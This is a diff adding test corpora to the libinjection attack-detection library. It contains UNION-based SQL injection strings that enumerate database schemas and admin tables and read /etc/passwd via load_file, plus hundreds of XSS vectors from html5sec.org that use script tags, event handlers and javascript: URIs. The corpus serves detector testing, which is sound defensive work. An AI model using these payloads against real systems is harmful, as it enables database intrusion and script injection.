1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 2 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 4 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 6 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 1 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 3 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 5 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 1 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(user(), 0x20),IFNULL(version(), 0x20),IFNULL(database(), 0x20)),0x3a3a2d3a3a)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f6574632f70617373776f7264), 0x20)),0x3a3a2d3a3a)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f746d702f6a756e6b), 0x20)),0x3a3a2d3a3a)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.adm where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin_users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admins where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrator where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrador where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administradores where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.client where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.clients where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.jos_users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.login where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.logins where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user_admin where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuario where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios_admin where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usr where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usrs where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.wp_users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d6173 and table_name like 0x2541424c4525#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 4 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 5 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 2 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 3 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 1 #
|
1124
libinjection/data/sqli-wordpress_rbarnett.txt
Normal file
1124
libinjection/data/sqli-wordpress_rbarnett.txt
Normal file
File diff suppressed because it is too large
Load diff
3
libinjection/data/tbd-xss-github-issue-68.txt
Normal file
3
libinjection/data/tbd-xss-github-issue-68.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
# https://github.com/client9/libinjection/issues/68
|
||||
|
||||
%3Cobject%00IRSDL+allowScriptAccess%3Dalways+data%3D%2F%2F0me.me%2Fdemo%2Fxss%2Fflash%2FnormalEmbededXSS.swf%3F
|
|
@ -0,0 +1,3 @@
|
|||
# https://twitter.com/0x6D6172696F/status/394932823645503488
|
||||
# http://pastebin.com/jNPbhduR
|
||||
<p style="font-family:',;a\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d\\61lert\\28\\31\\29\\3e:1'">
|
4
libinjection/data/xss-angular-pull-11290.txt
Normal file
4
libinjection/data/xss-angular-pull-11290.txt
Normal file
|
@ -0,0 +1,4 @@
|
|||
#
|
||||
# https://github.com/angular/angular.js/pull/11290
|
||||
#
|
||||
<animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />
|
488
libinjection/data/xss-html5secorg.txt
Normal file
488
libinjection/data/xss-html5secorg.txt
Normal file
|
@ -0,0 +1,488 @@
|
|||
#
|
||||
# http://html5sec.org
|
||||
# retreieved 2013-11-06
|
||||
|
||||
test 1 <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
|
||||
# obsolete firefox 3
|
||||
#test 2 <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
||||
|
||||
# obsolete firefox 3
|
||||
#test 3 <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
||||
|
||||
test 4 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
|
||||
|
||||
test 5 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
|
||||
|
||||
test 6 <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
|
||||
|
||||
test 7 <input onfocus=write(1) autofocus>
|
||||
|
||||
test 8 <input onblur=write(1) autofocus><input autofocus>
|
||||
|
||||
test 9 <a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
|
||||
|
||||
test 10 <video poster=javascript:alert(1)//></video>
|
||||
|
||||
test 11 <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
|
||||
|
||||
test 12 <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
|
||||
|
||||
# opera only, only "DoS"
|
||||
# test 13 <x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
|
||||
|
||||
# opera only, "DoS"
|
||||
# test 14 <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
|
||||
|
||||
test 15 <script>({0:#0=alert/#0#/#0#(0)})</script>
|
||||
|
||||
test 16 X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
|
||||
|
||||
test 17 <?xml-stylesheet href="javascript:alert(1)"?><root/>
|
||||
|
||||
test 18 <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
|
||||
|
||||
# obsolete firefox 3
|
||||
# test 19 <meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
|
||||
|
||||
test 20 <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
|
||||
|
||||
test 21 <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
|
||||
|
||||
test 22 <input onblur=focus() autofocus><input>
|
||||
|
||||
test 23 <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
|
||||
|
||||
test 24 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
|
||||
|
||||
test 25 <script src="#">{alert(1)}</script>;1
|
||||
|
||||
# obsolete firefox 4 and under
|
||||
# test 26 +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
|
||||
|
||||
test 27 <style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
|
||||
|
||||
test 28 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
|
||||
|
||||
test 29 <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
|
||||
|
||||
test 30 <style>@import "data:,*%7bx:expression(write(1))%7D";</style>
|
||||
|
||||
test 31_1 <frameset onload=alert(1)>
|
||||
|
||||
test 31_2 <body onload=alert(1)>
|
||||
|
||||
test 32 <table background="javascript:alert(1)"></table>
|
||||
|
||||
test 33 <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
|
||||
|
||||
test 34 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%25;height:100%25 src=test.vml#xss></vmlframe>
|
||||
|
||||
test 35 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
|
||||
|
||||
test 36 <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
|
||||
|
||||
test 37 <!--<img src="--><img src=x onerror=alert(1)//">
|
||||
|
||||
test 38 <comment><img src="</comment><img src=x onerror=alert(1)//">
|
||||
|
||||
# obsolete, FF 3.6 and Opera 11
|
||||
#test 39_1 <![><img src="]><img src=x onerror=alert(1)//">
|
||||
|
||||
test 39_2 <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
|
||||
|
||||
test 40 <style><img src="</style><img src=x onerror=alert(1)//">
|
||||
|
||||
test 41 <li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
|
||||
|
||||
test 42 <head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
|
||||
|
||||
test 43 <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style>
|
||||
|
||||
test 44 <style>*[{}@import'test.css?]{color: green;}</style>X
|
||||
|
||||
test 45 <div style="font-family:'foo[a];color:red;';">XXX</div>
|
||||
|
||||
test 46 <div style="font-family:foo}color=red;">XXX</div>
|
||||
|
||||
test 47 <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
|
||||
|
||||
test 48 <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
|
||||
|
||||
test 49 <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
|
||||
|
||||
test 50 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
||||
|
||||
test 51 <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
|
||||
|
||||
test 52 <x style="behavior:url(test.sct)">
|
||||
|
||||
test 53_1 <xml id="xss" src="test.htc"></xml>
|
||||
|
||||
test 53_2 <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
|
||||
|
||||
test 54 <script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script
|
||||
|
||||
test 55_1 <video><source onerror="alert(1)">
|
||||
test 55_2 <audio><source onerror="alert(1)">
|
||||
|
||||
test 56 <video onerror="alert(1)"><source></source></video>
|
||||
|
||||
#
|
||||
# Obsolete.. Firefox 3.6, Chrome 5, Safari 4
|
||||
#
|
||||
# test 57 <b <script>alert(1)//</script>0</script></b>
|
||||
|
||||
#
|
||||
# Obsolete Firefox 3.6
|
||||
#
|
||||
#test 58 <b><script<b></b><alert(1)</script </b></b>
|
||||
|
||||
test 59 <div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
|
||||
|
||||
# we reject all styles
|
||||
# test 60 TBD Obfuscation css-properties and values via ignored extra characters
|
||||
|
||||
# we reject all styles
|
||||
# test 61 TBD CSS encoding and escaping
|
||||
|
||||
# IE9 parses this as NOT-XSS
|
||||
# <x ?="foo"/><x foo="><img src=x onerror=alert(1)//"/>
|
||||
#
|
||||
#
|
||||
test 62_1 <x '="foo"><x foo='><img src=x onerror=alert(1)//'>
|
||||
|
||||
#
|
||||
# IE9 parses this as XSS
|
||||
# <!-- ="foo"><x foo --><img onerror="alert(1)//'" src="x"/>
|
||||
#
|
||||
test 62_2 <! '="foo"><x foo='><img src=x onerror=alert(2)//'>
|
||||
|
||||
#
|
||||
# IE9 parses this as XSS as previous
|
||||
#
|
||||
test 62_3 <? '="foo"><x foo='><img src=x onerror=alert(3)//'>
|
||||
|
||||
# bonus -- correctly detected
|
||||
test 62_4 <!-- '="foo"><x foo='--><img src=x onerror=alert(2)//'>
|
||||
|
||||
# bonus -- quotes reversed
|
||||
# same as 62_2
|
||||
test 62_5 <! "='foo'><x foo="><img src=x onerror=alert(2)//">
|
||||
|
||||
# bonus - use of backquotes
|
||||
test 62_5 <! `='foo'><x foo=`><img src=x onerror=alert(2)//`>
|
||||
|
||||
# bonus
|
||||
<!-- "='foo'><x -->"><img src=x onerror=alert(1)//">
|
||||
<!-- "=foo><x -->"><img src=x onerror=alert(1)//">
|
||||
<!-- "foo><x -->"><img src=x onerror=alert(1)//">
|
||||
<!-- "foo'><x -->"><img src=x onerror=alert(1)//">
|
||||
|
||||
test 63_1 <embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.↓, GC6↓,
|
||||
|
||||
test 63_2 <img src="javascript:alert(2)">
|
||||
|
||||
test 63_3 <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.
|
||||
|
||||
test 63_4 <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.
|
||||
|
||||
test 64_1 <!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
|
||||
|
||||
test 64_2 <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
|
||||
|
||||
test 65 <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
|
||||
|
||||
test 66 <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
|
||||
|
||||
test 67 <!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />
|
||||
|
||||
test 68 <doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
|
||||
|
||||
test 69 <card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
|
||||
|
||||
test 70 <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
|
||||
|
||||
test 71 <// style=x:expression\28write(1)\29>
|
||||
|
||||
test 72 <form><button formaction="javascript:alert(1)">X</button>
|
||||
|
||||
test 73 <event-source src="event.php" onload="alert(1)">
|
||||
|
||||
test 74 <a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
|
||||
|
||||
test 75 <script<{alert(1)}/></script </>
|
||||
|
||||
test 76_1 <?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
|
||||
|
||||
test 72_2 <!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='alert(1)'/>">
|
||||
|
||||
test 77 <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
|
||||
|
||||
test 78 <?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
|
||||
|
||||
test 79 <object allowscriptaccess="always" data="test.swf"></object>
|
||||
|
||||
# test 80 TBD IE6 and halfwidth/fullwidth Unicode characters
|
||||
|
||||
test 81 <x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
|
||||
|
||||
test 82 <?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
|
||||
|
||||
test 83 <x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
|
||||
|
||||
test 84 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x
|
||||
|
||||
test 85 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
|
||||
|
||||
test 86 <script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
|
||||
|
||||
test 86 <body oninput=alert(1)><input autofocus>
|
||||
|
||||
test 87 <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)">
|
||||
|
||||
test 88_0 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
test 88_1 <animation xlink:href="javascript:alert(1)"/>
|
||||
test 88_2 <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
|
||||
test 88_3 <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
|
||||
test 88_4 <foreignObject xlink:href="javascript:alert(1)"/>
|
||||
test 88_5 <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
|
||||
|
||||
test 89_1 <set attributeName="onmouseover" to="alert(1)"/>
|
||||
|
||||
test 89_2 <animate attributeName="onunload" to="alert(1)"/>
|
||||
|
||||
test 90_1 <div style=content:url(test2.svg)></div>
|
||||
test 90_2 <div style="background:url(test5.svg)">PRESS ENTER</div>
|
||||
test 90_3 <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)"> <!-- this file can be crossdomain if "action" attribute refers to an external file --> <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form>
|
||||
|
||||
# test 91
|
||||
test 91_1 <? foo="><script>alert(1)</script>">
|
||||
test 91_2 <! foo="><script>alert(1)</script>">
|
||||
test 91_3 </ foo="><script>alert(1)</script>">
|
||||
|
||||
# obsolete Safari 4
|
||||
#test 91_4 <? foo="><x foo='?><script>alert(1)</script>'>">
|
||||
|
||||
# obsolete Opera 11
|
||||
#test 91_5 <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">
|
||||
|
||||
test 91_6 <%25 foo><x foo="%25><script>alert(1)</script>">
|
||||
|
||||
test 92 <div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
|
||||
|
||||
test 93 <div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
|
||||
|
||||
test 94_1 <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>
|
||||
|
||||
test 94_2 <svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
|
||||
|
||||
test 95_1 <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage>
|
||||
|
||||
test 95_2 <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
|
||||
|
||||
test 96_1 <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
|
||||
|
||||
test 96_2 <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
|
||||
|
||||
test 97_1 <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML+='';</script>
|
||||
|
||||
test 97_2 <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>
|
||||
|
||||
test 98 <div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
|
||||
|
||||
test 99 XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>
|
||||
|
||||
# <img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
|
||||
#
|
||||
# normal case
|
||||
test 100_0 <img src=x onerror="alert(1)">
|
||||
|
||||
# [a]case
|
||||
test 100_1 <img%09src=x onerror="alert(1)">
|
||||
test 100_2 <img%0Asrc=x onerror="alert(1)">
|
||||
test 100_3 <img%0Csrc=x onerror="alert(1)">
|
||||
test 100_4 <img%0Dsrc=x onerror="alert(1)">
|
||||
test 100_5 <img%20src=x onerror="alert(1)">
|
||||
test 100_6 <img%47src=x onerror="alert(1)">
|
||||
test 100_7 <img%0Bsrc=x onerror="alert(1)">
|
||||
|
||||
# [b] case
|
||||
test 100_8 <img %47src=x onerror="alert(1)">
|
||||
test 100_9 <img %00src=x onerror="alert(1)">
|
||||
|
||||
# [c] case
|
||||
test 100_10 <img src=x onerror%09="alert(1)">
|
||||
test 100_11 <img src=x onerror%0A="alert(1)">
|
||||
test 100_12 <img src=x onerror%0C="alert(1)">
|
||||
test 100_13 <img src=x onerror%0D="alert(1)">
|
||||
test 100_14 <img src=x onerror%20="alert(1)">
|
||||
test 100_15 <img src=x onerror%00="alert(1)">
|
||||
test 100_16 <img src=x onerror%0B="alert(1)">
|
||||
|
||||
# [d] case
|
||||
test 100_17 <img src=x%09onerror="alert(1)">
|
||||
test 100_18 <img src=x%0Aonerror="alert(1)">
|
||||
test 100_19 <img src=x%0Conerror="alert(1)">
|
||||
test 100_20 <img src=x%0Donerror="alert(1)">
|
||||
test 100_21 <img src=x%20onerror="alert(1)">
|
||||
test 100_22 <img src=x%0Bonerror="alert(1)">
|
||||
|
||||
# [e] case
|
||||
test 100_23 <img src=x onerror=%09"alert(1)">
|
||||
test 100_24 <img src=x onerror=%0A"alert(1)">
|
||||
test 100_25 <img src=x onerror=%0C"alert(1)">
|
||||
test 100_26 <img src=x onerror=%0D"alert(1)">
|
||||
test 100_27 <img src=x onerror=%20"alert(1)">
|
||||
test 100_28 <img src=x onerror=%00"alert(1)">
|
||||
test 100_29 <img src=x onerror=%0B"alert(1)">
|
||||
|
||||
# <a href="[a]java[b]script[c]:alert(1)">XXX</a>
|
||||
test 101_x <a href="javascript:alert(1)">XXX</a>
|
||||
test 101_0 <a href="%00javascript:alert(1)">XXX</a>
|
||||
test 101_1 <a href="%01javascript:alert(1)">XXX</a>
|
||||
test 101_2 <a href="%02javascript:alert(1)">XXX</a>
|
||||
test 101_3 <a href="%03javascript:alert(1)">XXX</a>
|
||||
test 101_4 <a href="%04javascript:alert(1)">XXX</a>
|
||||
test 101_5 <a href="%05javascript:alert(1)">XXX</a>
|
||||
test 101_6 <a href="%06javascript:alert(1)">XXX</a>
|
||||
test 101_7 <a href="%07javascript:alert(1)">XXX</a>
|
||||
test 101_8 <a href="%08javascript:alert(1)">XXX</a>
|
||||
test 101_9 <a href="%09javascript:alert(1)">XXX</a>
|
||||
test 101_10 <a href="%0Ajavascript:alert(1)">XXX</a>
|
||||
